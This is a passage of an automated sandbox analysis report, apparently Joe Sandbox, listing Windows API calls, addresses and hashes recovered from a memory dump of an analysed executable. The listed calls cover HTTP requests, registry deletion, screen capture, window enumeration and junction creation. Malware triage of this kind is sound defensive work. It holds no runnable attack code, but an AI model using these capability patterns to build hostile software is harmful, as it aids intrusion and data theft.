                                                      • CloseHandle.KERNEL32(00000000), ref: 00EBB45C
                                                      • CloseHandle.KERNEL32(00000000), ref: 00EBB46E
                                                      • CloseHandle.KERNEL32(?), ref: 00EBB4E3
                                                      Similarity
                                                      • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                      • String ID:
                                                      APIs
                                                      • GetMenuItemCount.USER32(00F01990), ref: 00E72F8D
                                                      • GetMenuItemCount.USER32(00F01990), ref: 00E7303D
                                                      • GetCursorPos.USER32(?), ref: 00E73081
                                                      • SetForegroundWindow.USER32(00000000), ref: 00E7308A
                                                      • TrackPopupMenuEx.USER32(00F01990,00000000,?,00000000,00000000,00000000), ref: 00E7309D
                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E730A9
                                                      Similarity
                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                      • String ID: 0
                                                      APIs
                                                      • DestroyWindow.USER32(?,?), ref: 00EC6DEB
                                                        • Part of subcall function 00E36B57: _wcslen.LIBCMT ref: 00E36B6A
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00EC6E5F
                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00EC6E81
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EC6E94
                                                      • DestroyWindow.USER32(?), ref: 00EC6EB5
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E30000,00000000), ref: 00EC6EE4
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EC6EFD
                                                      • GetDesktopWindow.USER32 ref: 00EC6F16
                                                      • GetWindowRect.USER32(00000000), ref: 00EC6F1D
                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EC6F35
                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00EC6F4D
                                                        • Part of subcall function 00E49944: GetWindowLongW.USER32(?,000000EB), ref: 00E49952
                                                      Similarity
                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                      • String ID: 0$tooltips_class32
                                                      APIs
                                                        • Part of subcall function 00E49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E49BB2
                                                      • DragQueryPoint.SHELL32(?,?), ref: 00EC9147
                                                        • Part of subcall function 00EC7674: ClientToScreen.USER32(?,?), ref: 00EC769A
                                                        • Part of subcall function 00EC7674: GetWindowRect.USER32(?,?), ref: 00EC7710
                                                        • Part of subcall function 00EC7674: PtInRect.USER32(?,?,00EC8B89), ref: 00EC7720
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00EC91B0
                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00EC91BB
                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00EC91DE
                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00EC9225
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00EC923E
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00EC9255
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00EC9277
                                                      • DragFinish.SHELL32(?), ref: 00EC927E
                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00EC9371
                                                      Similarity
                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EAC4B0
                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00EAC4C3
                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00EAC4D7
                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00EAC4F0
                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00EAC533
                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00EAC549
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EAC554
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EAC584
                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00EAC5DC
                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00EAC5F0
                                                      • InternetCloseHandle.WININET(00000000), ref: 00EAC5FB
                                                      Similarity
                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                      • String ID:
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00EC8592
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00EC85A2
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00EC85AD
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00EC85BA
                                                      • GlobalLock.KERNEL32(00000000), ref: 00EC85C8
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00EC85D7
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00EC85E0
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00EC85E7
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00EC85F8
                                                      • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00ECFC38,?), ref: 00EC8611
                                                      • GlobalFree.KERNEL32(00000000), ref: 00EC8621
                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00EC8641
                                                      • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00EC8671
                                                      • DeleteObject.GDI32(?), ref: 00EC8699
                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00EC86AF
                                                      Similarity
                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                      • String ID:
                                                      APIs
                                                      • VariantInit.OLEAUT32(00000000), ref: 00EA1502
                                                      • VariantCopy.OLEAUT32(?,?), ref: 00EA150B
                                                      • VariantClear.OLEAUT32(?), ref: 00EA1517
                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00EA15FB
                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00EA1657
                                                      • VariantInit.OLEAUT32(?), ref: 00EA1708
                                                      • SysFreeString.OLEAUT32(?), ref: 00EA178C
                                                      • VariantClear.OLEAUT32(?), ref: 00EA17D8
                                                      • VariantClear.OLEAUT32(?), ref: 00EA17E7
                                                      • VariantInit.OLEAUT32(00000000), ref: 00EA1823
                                                      Similarity
                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                      APIs
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                        • Part of subcall function 00EBC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EBB6AE,?,?), ref: 00EBC9B5
                                                        • Part of subcall function 00EBC998: _wcslen.LIBCMT ref: 00EBC9F1
                                                        • Part of subcall function 00EBC998: _wcslen.LIBCMT ref: 00EBCA68
                                                        • Part of subcall function 00EBC998: _wcslen.LIBCMT ref: 00EBCA9E
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EBB6F4
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EBB772
                                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 00EBB80A
                                                      • RegCloseKey.ADVAPI32(?), ref: 00EBB87E
                                                      • RegCloseKey.ADVAPI32(?), ref: 00EBB89C
                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00EBB8F2
                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EBB904
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00EBB922
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00EBB983
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00EBB994
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 146587525-4033151799
                                                      • Opcode ID: 57a74036ffe01bfd083fda3f3dd5664b7e2ed5d9f8807bde7160bd40b6e4281f
                                                      • Instruction ID: d09a5283000303f3b363c1de921949f908ac62aa1587e980440e1a42db0caaf0
                                                      • Opcode Fuzzy Hash: 57a74036ffe01bfd083fda3f3dd5664b7e2ed5d9f8807bde7160bd40b6e4281f
                                                      • Instruction Fuzzy Hash: 56C1A134208201AFD714DF14C495F6ABBE5FF84318F18A55CF59A6B2A2CBB1EC46CB91
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 00EB25D8
                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00EB25E8
                                                      • CreateCompatibleDC.GDI32(?), ref: 00EB25F4
                                                      • SelectObject.GDI32(00000000,?), ref: 00EB2601
                                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00EB266D
                                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00EB26AC
                                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00EB26D0
                                                      • SelectObject.GDI32(?,?), ref: 00EB26D8
                                                      • DeleteObject.GDI32(?), ref: 00EB26E1
                                                      • DeleteDC.GDI32(?), ref: 00EB26E8
                                                      • ReleaseDC.USER32(00000000,?), ref: 00EB26F3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                      • String ID: (
                                                      • API String ID: 2598888154-3887548279
                                                      • Opcode ID: 148990bf616b77f9aef3aa2975d6ee69503dfe5215c8e30616df553d61cb7cd5
                                                      • Instruction ID: 06ea45b831bf64c6390d281d18e0ce335821523b2e71cf4134a4f36c102771a0
                                                      • Opcode Fuzzy Hash: 148990bf616b77f9aef3aa2975d6ee69503dfe5215c8e30616df553d61cb7cd5
                                                      • Instruction Fuzzy Hash: 7061D075D00219EFCB04CFA9D984EAEBBF5FF48310F248529EA59B7250D771A9418F90
                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 00E6DAA1
                                                        • Part of subcall function 00E6D63C: _free.LIBCMT ref: 00E6D659
                                                        • Part of subcall function 00E6D63C: _free.LIBCMT ref: 00E6D66B
                                                        • Part of subcall function 00E6D63C: _free.LIBCMT ref: 00E6D67D
                                                        • Part of subcall function 00E6D63C: _free.LIBCMT ref: 00E6D68F
                                                        • Part of subcall function 00E6D63C: _free.LIBCMT ref: 00E6D6A1
                                                        • Part of subcall function 00E6D63C: _free.LIBCMT ref: 00E6D6B3
                                                        • Part of subcall function 00E6D63C: _free.LIBCMT ref: 00E6D6C5
                                                        • Part of subcall function 00E6D63C: _free.LIBCMT ref: 00E6D6D7
                                                        • Part of subcall function 00E6D63C: _free.LIBCMT ref: 00E6D6E9
                                                        • Part of subcall function 00E6D63C: _free.LIBCMT ref: 00E6D6FB
                                                        • Part of subcall function 00E6D63C: _free.LIBCMT ref: 00E6D70D
                                                        • Part of subcall function 00E6D63C: _free.LIBCMT ref: 00E6D71F
                                                        • Part of subcall function 00E6D63C: _free.LIBCMT ref: 00E6D731
                                                      • _free.LIBCMT ref: 00E6DA96
                                                        • Part of subcall function 00E629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E6D7D1,00000000,00000000,00000000,00000000,?,00E6D7F8,00000000,00000007,00000000,?,00E6DBF5,00000000), ref: 00E629DE
                                                        • Part of subcall function 00E629C8: GetLastError.KERNEL32(00000000,?,00E6D7D1,00000000,00000000,00000000,00000000,?,00E6D7F8,00000000,00000007,00000000,?,00E6DBF5,00000000,00000000), ref: 00E629F0
                                                      • _free.LIBCMT ref: 00E6DAB8
                                                      • _free.LIBCMT ref: 00E6DACD
                                                      • _free.LIBCMT ref: 00E6DAD8
                                                      • _free.LIBCMT ref: 00E6DAFA
                                                      • _free.LIBCMT ref: 00E6DB0D
                                                      • _free.LIBCMT ref: 00E6DB1B
                                                      • _free.LIBCMT ref: 00E6DB26
                                                      • _free.LIBCMT ref: 00E6DB5E
                                                      • _free.LIBCMT ref: 00E6DB65
                                                      • _free.LIBCMT ref: 00E6DB82
                                                      • _free.LIBCMT ref: 00E6DB9A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      • Opcode ID: 8bf63b56cd5670e9be68ef076ece6c1d37506ab2001b2b5960f9e2b8a69b67cc
                                                      • Instruction ID: fdbae7f44e6001d0ebaaab3685497ee6e5ccdcfdf36f7eaf4d17e787bc934f9e
                                                      • Opcode Fuzzy Hash: 8bf63b56cd5670e9be68ef076ece6c1d37506ab2001b2b5960f9e2b8a69b67cc
                                                      • Instruction Fuzzy Hash: 9C317A31B88A049FEB25AA78FC41B6A77E9FF803E4F95641DE148F7191DA30AC408720
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00E9369C
                                                      • _wcslen.LIBCMT ref: 00E936A7
                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E93797
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00E9380C
                                                      • GetDlgCtrlID.USER32(?), ref: 00E9385D
                                                      • GetWindowRect.USER32(?,?), ref: 00E93882
                                                      • GetParent.USER32(?), ref: 00E938A0
                                                      • ScreenToClient.USER32(00000000), ref: 00E938A7
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00E93921
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00E9395D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                      • String ID: %s%u
                                                      • API String ID: 4010501982-679674701
                                                      • Opcode ID: b72d8760dc8f0c3a1b3eff5603a9a16bb95d65ebc25a8b86ef9ea57e765bd21c
                                                      • Instruction ID: 22e2241c34628278ebc522d0a6b9a464ac53ad7e35d81ab38e6da9f51dbbb49c
                                                      • Opcode Fuzzy Hash: b72d8760dc8f0c3a1b3eff5603a9a16bb95d65ebc25a8b86ef9ea57e765bd21c
                                                      • Instruction Fuzzy Hash: 7391C171204706AFDB18DF74C885FAAB7E8FF44354F109529F999E2190DB30EA4ACB91
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00E94994
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00E949DA
                                                      • _wcslen.LIBCMT ref: 00E949EB
                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00E949F7
                                                      • _wcsstr.LIBVCRUNTIME ref: 00E94A2C
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00E94A64
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00E94A9D
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00E94AE6
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00E94B20
                                                      • GetWindowRect.USER32(?,?), ref: 00E94B8B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                      • String ID: ThumbnailClass
                                                      • API String ID: 1311036022-1241985126
                                                      • Opcode ID: 8bd619c7b3221e17cb76f3df1a65a98a618e8368f425245cc243fc6d72b01c9b
                                                      • Instruction ID: 99d7d088cb8bc5f09e804017685f5fa7361b79978bc0384d5712888712812a62
                                                      • Opcode Fuzzy Hash: 8bd619c7b3221e17cb76f3df1a65a98a618e8368f425245cc243fc6d72b01c9b
                                                      • Instruction Fuzzy Hash: 3D91A0B11042059FDF04DF14C985FAA77E8FF84718F046469FD85AA196EB30ED46CBA1
                                                      APIs
                                                        • Part of subcall function 00E49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E49BB2
                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EC8D5A
                                                      • GetFocus.USER32 ref: 00EC8D6A
                                                      • GetDlgCtrlID.USER32(00000000), ref: 00EC8D75
                                                      • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00EC8E1D
                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00EC8ECF
                                                      • GetMenuItemCount.USER32(?), ref: 00EC8EEC
                                                      • GetMenuItemID.USER32(?,00000000), ref: 00EC8EFC
                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00EC8F2E
                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00EC8F70
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EC8FA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                      • String ID: 0
                                                      • API String ID: 1026556194-4108050209
                                                      • Opcode ID: 4f5f5f452e6f8fc1edf3d4b82a1fe811ef5ae9033ceb318c2e4071461e00bdff
                                                      • Instruction ID: bcf287653a2b683d4b202f3dbdba01c4032b60ced41473c5810bf78ff14dee4f
                                                      • Opcode Fuzzy Hash: 4f5f5f452e6f8fc1edf3d4b82a1fe811ef5ae9033ceb318c2e4071461e00bdff
                                                      • Instruction Fuzzy Hash: E181BC716083459FD710CF14CB84EAB7BE9FB88318F14192DF985A7291DB32D906CB62
                                                      APIs
                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00E9DC20
                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00E9DC46
                                                      • _wcslen.LIBCMT ref: 00E9DC50
                                                      • _wcsstr.LIBVCRUNTIME ref: 00E9DCA0
                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00E9DCBC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                      • API String ID: 1939486746-1459072770
                                                      • Opcode ID: 0f1e9cd68afb4a4f96d830fe3ba36ee67383be19eea343e586130e01b80ffa3d
                                                      • Instruction ID: 845fecf741f11204a2ebd34baa7d3ffdc6bfde6f6ea5bee072a64f35aec934d7
                                                      • Opcode Fuzzy Hash: 0f1e9cd68afb4a4f96d830fe3ba36ee67383be19eea343e586130e01b80ffa3d
                                                      • Instruction Fuzzy Hash: DD4143329043147ADB14AB749C07EFF77ACEF41B61F102869F904B6182EB75A90587A1
                                                      APIs
                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00EBCC64
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00EBCC8D
                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00EBCD48
                                                        • Part of subcall function 00EBCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00EBCCAA
                                                        • Part of subcall function 00EBCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00EBCCBD
                                                        • Part of subcall function 00EBCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EBCCCF
                                                        • Part of subcall function 00EBCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00EBCD05
                                                        • Part of subcall function 00EBCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00EBCD28
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00EBCCF3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 2734957052-4033151799
                                                      • Opcode ID: e751e2e97f23ad33f4997820329479ee1e379fafe609c3146fbd925888be7042
                                                      • Instruction ID: 287ce62aba34e70552b4718ebe9a4b92ed923cb6f5e5d2d9fcb9ed75df928808
                                                      • Opcode Fuzzy Hash: e751e2e97f23ad33f4997820329479ee1e379fafe609c3146fbd925888be7042
                                                      • Instruction Fuzzy Hash: 8D318E75901129BFDB208B52DC88EFFBB7CEF55754F200165F909F2250DA309A4ADAA0
                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EA3D40
                                                      • _wcslen.LIBCMT ref: 00EA3D6D
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00EA3D9D
                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00EA3DBE
                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00EA3DCE
                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00EA3E55
                                                      • CloseHandle.KERNEL32(00000000), ref: 00EA3E60
                                                      • CloseHandle.KERNEL32(00000000), ref: 00EA3E6B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                      • String ID: :$\$\??\%s
                                                      • API String ID: 1149970189-3457252023
                                                      • Opcode ID: bed79e107e72e3b0a8361ae29ec2ec65b321c0fb88d4ad5695fff889ac66a7f7
                                                      • Instruction ID: 8981bba96303bd42cd934fb3cc2349fcf67b0ec34b17d73999c11c91a6cc70e5
                                                      • Opcode Fuzzy Hash: bed79e107e72e3b0a8361ae29ec2ec65b321c0fb88d4ad5695fff889ac66a7f7
                                                      • Instruction Fuzzy Hash: 7D31D472900209ABDB209BA1DC49FEF37BCEF89745F2050B5F909F6060E77497498B24
